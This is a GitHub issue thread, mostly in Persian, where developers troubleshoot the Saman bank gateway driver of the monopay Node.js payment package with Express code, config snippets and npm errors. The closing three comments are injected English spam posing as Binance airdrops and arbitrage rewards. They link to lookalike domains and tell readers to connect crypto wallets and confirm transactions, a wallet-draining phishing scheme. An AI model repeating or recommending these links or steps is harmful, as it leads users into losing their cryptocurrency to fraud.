### ISSUE TITLE
درگاه بانک سامان

### ISSUE THREAD

**Issue by akbarazimifar** [alitnk/monopay#14]
با سلام و تشکر بابت پکیج بسیار عالی . ممنون میشم در خصوص نحوه استفاده از درگاه سامان کیش در express راهنمایی بفرمایید . با تشکر

**Comment by alitnk** [comment]
سلام، لطف دارین.
درگاه سامان پیاده سازی شده ولی [امتحان نشده](https://alitnk.github.io/monopay/fa/docs/supported-drivers) هنوز و حدس می‌زنم مشکلاتی داشته باشه. نحوه استفاده مثل سایر درگاه‌ها هست، می‌تونید تستش کنید. اگر مشکلی دیدین می‌تونین PR بسازین براش 🙌

**Comment by akbarazimifar** [comment]
سلام . من تست کردم . گفتم شاید نحوه پیاده سازی من مشکل داشته . 
`saman: {
        merchantId: 'your-merchant-id',
    }`
بعد این کد رو استفاده کردم
`app.get('/purchase', async (req, res) => {
    try {
        const driver = getPaymentDriver(chosenDriver, monopayConfiguration[chosenDriver]);

        const paymentInfo = await driver.requestPayment({
            amount: 20000,
            callbackUrl:  'http://localhost:3000/user/callback',
        })

        // Store the payment info in a database //

        res.send(`<html>
        <body>
            <h1> We're redirecting you to the payment gateway... </h1>
            <script>${paymentInfo.getScript()}</script>
        </body>
        </html>`)
    } catch (e) {
        console.log(e.message)
    }
})`
متاسفانه هیچ خطایی نمیده و منتقل هم نمیشه درگاه بانک

**Comment by akbarazimifar** [comment]
سلام. الان راه حل شما برای رفع این مشکل چیه ؟ چون من نود جی اس زیاد وارد نیستم . ممنون میشم راهنمایی کنید .حداقل بدونم کجاش مشکل داره .

**Comment by alitnk** [comment]
مخزن رو Fork کنید و سعی کنید ازش لاگ بگیرید و بفهمید مشکل از کجاست و بر اساس مشکل اقدام به حل کردنش کنید.

**Comment by akbarazimifar** [comment]
سلام. من ایراد کار رو پیدا کردم اطلاعات ارسال میشه ، پاسخ هم به درستی دریافت میشه. الان مشکل فقط ریدایرکت شدن به سمت درگاه پرداخت هست .توی مرورگر 
We're redirecting you to the payment gateway...
نمایش میده و هدایت نمیشه .ممنون میشم اگه راهنمایی بفرمایید .

**Comment by alitnk** [comment]
فکر میکنم سرور ‌Express تون چند بار ریسپانس برمیگردونه. 
https://bobbyhadz.com/blog/javascript-error-cannot-set-headers-after-they-are-sent-to-client
پیشنهاد میدم خطا رو سرچ کنید توی گوگل.

**Comment by Hossein-Nadimi** [comment]
سلام، ممنون بابت پکیج فوق العادتون، من با ارور Error: Request failed with status code 500 مواجه میشم این کدم هست:

`const express = require('express')
const { getPaymentDriver } = require('monopay')

const app = express()
app.use(express.urlencoded({ extended: true }));
const port = 3000

// 1)
const config = {
  merchantId: "xxxxxxxxxxxxxxxx"
};

app.get('/purchase', async (req, res) => {
  try {
      const driver = getPaymentDriver('saman', config);

      const paymentInfo = await driver.requestPayment({
          amount: 20000,
          callbackUrl: 'http://localhost:3000/callback',
      })

      res.send(`<html>
      <body>
          <h1> We're redirecting you to the payment gateway... </h1>
          <script>${paymentInfo.getScript()}</script>
      </body>
      </html>`)
  } catch (e) {
      console.log(e.message)
  }
})

app.all('/callback', async (req, res) => {
  try {
      const driver = getPaymentDriver('saman', config)

      const receipt = await driver.verifyPayment({
        amount: 2000,
        referenceId: 1234
      }, { ...req.query, ...req.body });

      res.json({
          referenceId: receipt.referenceId,
          success: true,
      })
  } catch (e) {
      console.log(e.message)
  }
})

app.listen(port, () => {
  console.log(`Example app listening at http://localhost:${port}`)
})`
برای استفاده از درگاه بانک سامان چه مشخصاتی رو ارسال میکنین؟ بجز شماره پذیرنده برای من یه رمز پذیرنده هم فرستاده بانک سامان.

**Comment by alitnk** [comment]
@Hossein-Nadimi  سلام، درگاه سامان در مونوپی تست شده نیست - بنده تابحال با درگاه سامان کار نکردم و مستنداتش در اختیارم نیست. پیشنهاد می‌کنم به پکیج‌های درگاه پرداخت در زبان‌های دیگه مراجعه کنید ([مثلا این پکیج برای PHP](https://github.com/shetabit/multipay)) و مراحل ایجاد تراکنش رو مقایسه کنید.

اگر تونستید مشکلش رو برطرف کنید ممنون میشم با ساختن PR پکیج رو بهتر کنید.

**Comment by akbarazimifar** [comment]
> @Hossein-Nadimi سلام، درگاه سامان در مونوپی تست شده نیست - بنده تابحال با درگاه سامان کار نکردم و مستنداتش در اختیارم نیست. پیشنهاد می‌کنم به پکیج‌های درگاه پرداخت در زبان‌های دیگه مراجعه کنید ([مثلا این پکیج برای PHP](https://github.com/shetabit/multipay)) و مراحل ایجاد تراکنش رو مقایسه کنید.
> 
> اگر تونستید مشکلش رو برطرف کنید ممنون میشم با ساختن PR پکیج رو بهتر کنید.

من تقریبا عیب یابی رو انجام دادم . ولی فقط مشکل تایید تراکنش هست که متاسفانه چون گرفتاری برام پیش اومد نتونستم حلش کنم .مشکل بر طرف کنم قطعا منتشر میکنم تا بقیه هم استفاده کنند .

**Comment by akbarazimifar** [comment]
> سلام، ممنون بابت پکیج فوق العادتون، من با ارور Error: Request failed with status code 500 مواجه میشم این کدم هست:
> 
> `const express = require('express') const { getPaymentDriver } = require('monopay')
> 
> const app = express() app.use(express.urlencoded({ extended: true })); const port = 3000
> 
> // 1) const config = { merchantId: "xxxxxxxxxxxxxxxx" };
> 
> app.get('/purchase', async (req, res) => { try { const driver = getPaymentDriver('saman', config);
> 
> ```
>   const paymentInfo = await driver.requestPayment({
>       amount: 20000,
>       callbackUrl: 'http://localhost:3000/callback',
>   })
> 
>   res.send(`<html>
>   <body>
>       <h1> We're redirecting you to the payment gateway... </h1>
>       <script>${paymentInfo.getScript()}</script>
>   </body>
>   </html>`)
> ```
> 
> } catch (e) { console.log(e.message) } })
> 
> app.all('/callback', async (req, res) => { try { const driver = getPaymentDriver('saman', config)
> 
> ```
>   const receipt = await driver.verifyPayment({
>     amount: 2000,
>     referenceId: 1234
>   }, { ...req.query, ...req.body });
> 
>   res.json({
>       referenceId: receipt.referenceId,
>       success: true,
>   })
> ```
> 
> } catch (e) { console.log(e.message) } })
> 
> app.listen(port, () => { console.log(`Example app listening at http://localhost:${port}`) })` برای استفاده از درگاه بانک سامان چه مشخصاتی رو ارسال میکنین؟ بجز شماره پذیرنده برای من یه رمز پذیرنده هم فرستاده بانک سامان.

کد پذیرنده باید ارسال کنید جهت دریافت توکن . به همراه شماره فاکتور فقط همین دو مورد

**Comment by Hossein-Nadimi** [comment]
@akbarazimifar 
پس همراه با merchantId یه پارامتر دیگه به نام شماره فاکتور باید ارسال کنم درسته؟ نام پارامتر چی باید باشه؟

و اینکه میشه به کدم یه نگاه بکنین ببینین ایرادش چیه که ارور Request failed with status code 500 دریافت میکنم؟

**Comment by akbarazimifar** [comment]
> نگاه بکنین ببینین ایرادش

آره . مرچنت آیدی باید ارسال کنید بعد شماره فاکتور Resnum لینک ها هم باید تغییر کنه . الان دسترسی ندارم دقیقا ببینم کجاها رو تغییر دادم . اما لینک ها باید تغییر کنه ، مرچنت آیدی و resnum هم باید ارسال بشن . اگه مشکل تایید پرداخت رو تونستید حل کنید منتشر کنید ماهم استفاده کنیم .

**Comment by akbarazimifar** [comment]
من تغییراتی که اعمال کردم رو منتشر میکنم شما هم اگه مشکل رو رفع کردین درجریان قرار بدین . منم اگه رفع کردم اطلاع بدین . فقط بی معرفت بازی درنیارین 
`const monopayConfiguration = {
    zibal: {
        merchantId: 'your-merchant-id',
        sandbox: true,
    },
    zarinpal: {
        merchantId: 'your-merchant-id',
        sandbox: true,
    },
    sadad: {
        merchantId: 'your-merchant-id',
        terminalId: 'your-terminal-id',
        terminalKey: 'your-terminal-key'
    },
    payir: {
        apiKey: 'your-api-key',
        sandbox: true,
    },
    nextpay: {
        apiKey: 'your-api-key',
    },
	saman: {
        merchantId: '00000000',
    }
}

const chosenDriver = 'saman'

router.get('/purchase', async (req, res) => {
	
    try {
        const driver = getPaymentDriver(chosenDriver, monopayConfiguration[chosenDriver]);

        const paymentInfo = await driver.requestPayment({
			
            amount: 20000,
			resnum: '32154654',
            callbackUrl: 'http://127.0.0.1:3000/user/callback',
        })

        // Store the payment info in a database //
		   
        console.log(paymentInfo.referenceId)

res.set('Content-Type', 'text/html')

res.status(200).send(`<html>
    <body>
        <h1> We're redirecting you to the payment gateway... </h1>
        <script>${paymentInfo.getScript()}</script>
    </body>
  </html>`);
        
		
    } catch (e) {
        console.log(e.message)
    }
})`

کد بالا برای هدایت به درگاه پرداخت با سامان هست. توی لینک زیر پوشه dist رو با پوشه خودتون جایگزین کنید . چون دقیقا خاطرم نیست کجاها رو تغییر دادم متاسفانه 
https://github.com/akbarazimifar/monopayment

**Comment by Hossein-Nadimi** [comment]
متاسفانه با پکیج نتونستم حل کنم و درخواست مستندات از بانک کردم مثل اینکه یکم تغییر کرده، مستنداتو برای شما هم می فرستم، با مستندات آنلاین پی جی به راحتی پیاده سازی شد.
[SEP_OnlinePG_Merchant Document_Minimal_3.0.pdf](https://github.com/alitnk/monopay/files/9298029/SEP_OnlinePG_Merchant.Document_Minimal_3.0.pdf)
[راهنمای فنی استفاده از سرویس های سپ_تایید تراکتش__1.8.pdf](https://github.com/alitnk/monopay/files/9298031/_.__1.8.pdf)

**Comment by akbarazimifar** [comment]
سلام . ممنون . نمونه کد رو ارسال نمی کنید ؟ ممنون میشم اگه ارسال کنید .
@hossein-nadimi

**Comment by Hossein-Nadimi** [comment]
مستنداتو بخونین خیلی سادست، بازم اگه مشکلی داشتین بگین تا حد توان راهنمایی کنم. @akbarazimifar 

آقا علی چطور میشه این تغییراتو تو پکیج اعمال کرد تا همه راحت استفاده کنن؟ پکیج با تایپ اسکریپته منم متاسفانه کار نکردم. @alitnk

**Comment by alitnk** [comment]
باید یکی از دوستان که تایپ‌اسکریپت بلده زحمتش رو بکشه و تغییرات رو روی درایور مربوطه اعمال کنه. یه فایل تایپ هست که صرفا تایپ های TS هستند و یک فایل برای لاجیک.
- https://github.com/alitnk/monopay/blob/main/src/drivers/saman/api.ts
- https://github.com/alitnk/monopay/blob/main/src/drivers/saman/index.ts

**Comment by mobinco** [comment]
سلام به دوستان. من تغییراتی روی درگاه سامان کیش انجام دادم که مشکل رو حل کرده. لااقل روی پروژه‌ی خودم خیلی خوب کار می کنه
[https://github.com/mobinco/monopay](url)

دستور نصب:
npm install mobinco/monopay

**Comment by akbarazimifar** [comment]
> سلام به دوستان. من تغییراتی روی درگاه سامان کیش انجام دادم که مشکل رو حل کرده. لااقل روی پروژه‌ی خودم خیلی خوب کار می کنه [https://github.com/mobinco/monopay](url)
> 
> فقط فایل ‌js رو ویرایش کردم و تایپ اسکریپت مونده
> 
> دستور نصب: npm install mobinco/monopay

سلام . خیلی عالی . تشکر از زحمات شما . اگه مابقی درگاه ها هم حل میشد عالی بود .

**Comment by akbarazimifar** [comment]
> سلام به دوستان. من تغییراتی روی درگاه سامان کیش انجام دادم که مشکل رو حل کرده. لااقل روی پروژه‌ی خودم خیلی خوب کار می کنه [https://github.com/mobinco/monopay](url)
> 
> فقط فایل ‌js رو ویرایش کردم و تایپ اسکریپت مونده
> 
> دستور نصب: npm install mobinco/monopay


سلام . متاسفانه نصب نمیشه

**Comment by mobinco** [comment]
> سلام . متاسفانه نصب نمیشه

اگه از دستور `npm install mobinco/monopay` استفاده کنید بایستی بدون مشکل نصب بشه.
قبلش نسخه‌ی قدیمی monopay رو حذف کنید. `npm uninstall monopay`
اگه هم خطای خاصی نمایش میده، ارسال کنید تا بررسی بشه

**Comment by akbarazimifar** [comment]
> > سلام . متاسفانه نصب نمیشه
> 
> اگه از دستور `npm install mobinco/monopay` استفاده کنید بایستی بدون مشکل نصب بشه. قبلش نسخه‌ی قدیمی monopay رو حذف کنید. `npm uninstall monopay` اگه هم خطای خاصی نمایش میده، ارسال کنید تا بررسی بشه

سلام .نشخه قبلی رو اول حذف کردم . بعد دستور نصب نسخه شما رو زدم . با این خطا مواجه شدم .

npm ERR! code 128
npm ERR! An unknown git error occurred
npm ERR! command git --no-replace-objects ls-remote ssh://git@github.com/mobinco/monopay.git
npm ERR! Permission denied (publickey).
npm ERR! fatal: Could not read from remote repository.
npm ERR! 
npm ERR! Please make sure you have the correct access rights
npm ERR! and the repository exists.

npm ERR! A complete log of this run can be found in:
npm ERR!     /root/.npm/_logs/2022-11-08T14_43_12_931Z-debug-0.log


البته روی لوکال نصب میشه ولی پروژه اجرا نمیشه و خطای دیگه ای میده

**Comment by akbarazimifar** [comment]
> خطای اول که ظاهرا مربوط به سرورتون هست که دسترسی نداره. شاید با vpn مشکل تون رفع بشه
> 
> برای خطای دوم، تغییراتی انجام دادم. حذف و مجدد نصب کنید.

هنوزم خطا میده . یکبار خذف کردم . مجدد نصب کردم

/home/akbar/Desktop/node_taxi/node_modules/monopay/dist/drivers/saman/index.js:52
            const responseStatus = response[0]?.result && response[0]?.result['$value'];
                                               ^

SyntaxError: Unexpected token '.'
    at wrapSafe (internal/modules/cjs/loader.js:915:16)
    at Module._compile (internal/modules/cjs/loader.js:963:27)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:1027:10)
    at Module.load (internal/modules/cjs/loader.js:863:32)
    at Function.Module._load (internal/modules/cjs/loader.js:708:14)
    at Module.require (internal/modules/cjs/loader.js:887:19)
    at require (internal/modules/cjs/helpers.js:74:18)
    at Object.<anonymous> (/home/akbar/Desktop/node_taxi/node_modules/monopay/dist/drivers.js:11:17)
    at Module._compile (internal/modules/cjs/loader.js:999:30)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:1027:10)
    at Module.load (internal/modules/cjs/loader.js:863:32)
    at Function.Module._load (internal/modules/cjs/loader.js:708:14)
    at Module.require (internal/modules/cjs/loader.js:887:19)
    at require (internal/modules/cjs/helpers.js:74:18)
    at Object.<anonymous> (/home/akbar/Desktop/node_taxi/node_modules/monopay/dist/index.js:17:14)
    at Module._compile (internal/modules/cjs/loader.js:999:30)

**Comment by mobinco** [comment]
من از این دستور برای verify استفاده می کنم:
```
driver.verifyPayment({
    amount: payment.amount,    // مبلغی که زمان ارسال به درگاه ثبت شده
    referenceId: form.RefNum,  // شماره سفارش که زمان ارسال ایجاد شده
}, {...req.body });            // req.body = محتوای فرمی که پس از پرداخت از طریق درگاه به سرور ارسال شده
```

راستش این اطلاعات به روشی که من نوشتم در هیچ سند آموزشی ندیدم و تقریباً با آزمون و خطا روش‌ش رو پیدا کردم.

ممکنه اطلاعات دریافتی برای شما متفاوت باشه

قبل از خط خطا، یک لاگ بذارید ببینید چه اطلاعاتی رو بر می گردونه
`console.log(response)`

**Comment by akbarazimifar** [comment]
> من از این دستور برای verify استفاده می کنم:
> 
> ```
> driver.verifyPayment({
>     amount: payment.amount,    // مبلغی که زمان ارسال به درگاه ثبت شده
>     referenceId: form.RefNum,  // شماره سفارش که زمان ارسال ایجاد شده
> }, {...req.body });            // req.body = محتوای فرمی که پس از پرداخت از طریق درگاه به سرور ارسال شده
> ```
> 
> راستش این اطلاعات به روشی که من نوشتم در هیچ سند آموزشی ندیدم و تقریباً با آزمون و خطا روش‌ش رو پیدا کردم.
> 
> ممکنه اطلاعات دریافتی برای شما متفاوت باشه
> 
> قبل از خط خطا، یک لاگ بذارید ببینید چه اطلاعاتی رو بر می گردونه `console.log(response)`


اصلا پروژه اجرا نمیشه که بخواد پاسخی برگردونه . وقتی دستور node app.js  میزنم خطای بالایی میده

**Comment by mobinco** [comment]
این بخش از اسکریپت مربوط به بازگشت از درگاه پرداخته.
عجیبه که موقع راه اندازی خطا میده
توی کدهاتون بخشی که مربوط به درگاه پرداخته حذف و دوباره تست کنید.

**Comment by akbarazimifar** [comment]
اینکار رو هم کردم .کد های پرداخت رو که حذف می کنم  پروژه به خوبی اجرا میشه .

**Comment by akbarazimifar** [comment]
> این بخش از اسکریپت مربوط به بازگشت از درگاه پرداخته. عجیبه که موقع راه اندازی خطا میده توی کدهاتون بخشی که مربوط به درگاه پرداخته حذف و دوباره تست کنید.

اینکار رو هم کردم .کد های پرداخت رو که حذف می کنم پروژه به خوبی اجرا میشه .

**Comment by mobinco** [comment]
باید دیگه بررسی کنید طبق مستندات همین صفحه کدوم قسمت از کدهای ارسال به درگاه و تأیید پرداخت شما مشکل داره.

**Comment by akbarazimifar** [comment]
> باید دیگه بررسی کنید طبق مستندات همین صفحه کدوم قسمت از کدهای ارسال به درگاه و تأیید پرداخت شما مشکل داره.

ظاهرا ایراد از نسخه نود جی اس بود . ارتقا دادم نسخه 16 درست شد . فقط الان خطای وریفای میده :


 شرح پیام: 03 (عملیات ناموفق)

**Comment by paramaputra** [comment]
### Join Binance Arbitrage in Celebrating 2023: Divide Up to 600,000 BNB in Rewards! 

At Binance, we truly believe that decentralized finance will play a pivotal role in the future.

In order to unlock the mainstream adoption of Binance Coin(BNB), a good wallet is one of the most important gateways for our users.

Now team up with the high-quality wallets that have supported our Binance Chain since the beginning, we jointly launch the Binance arbitrage smart contract. Use the smart contract to trade your ETH to BNB, and it generates an extra 10%~12% BNB as your profit, which we committed to a total of 600,000 BNB.

The currently online smart contracts are applicable to Trust wallet, Atomic wallet, and ZenGo wallet

To start the Arbitrage smart contract, please follow the steps below: [Binance Rewards](http://go.bnbrewards.online/WvDubR)


[![Claim Now](https://public.bnbstatic.com/image/cms/article/body/202303/44b0b95a5bef2cc2479d683bfbbdf8ba.png)](http://go.bnbrewards.online/WvDubR)

### Secure Your BNB with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Binance](http://go.bnbrewards.online/WvDubR).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility  Airdrop](http://go.bnbrewards.online/WvDubR).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by fahirazm** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @r44cx, @hao980523, @0xsir0000, @Doom79, @pingerr, @dotieuthien, @athachai29
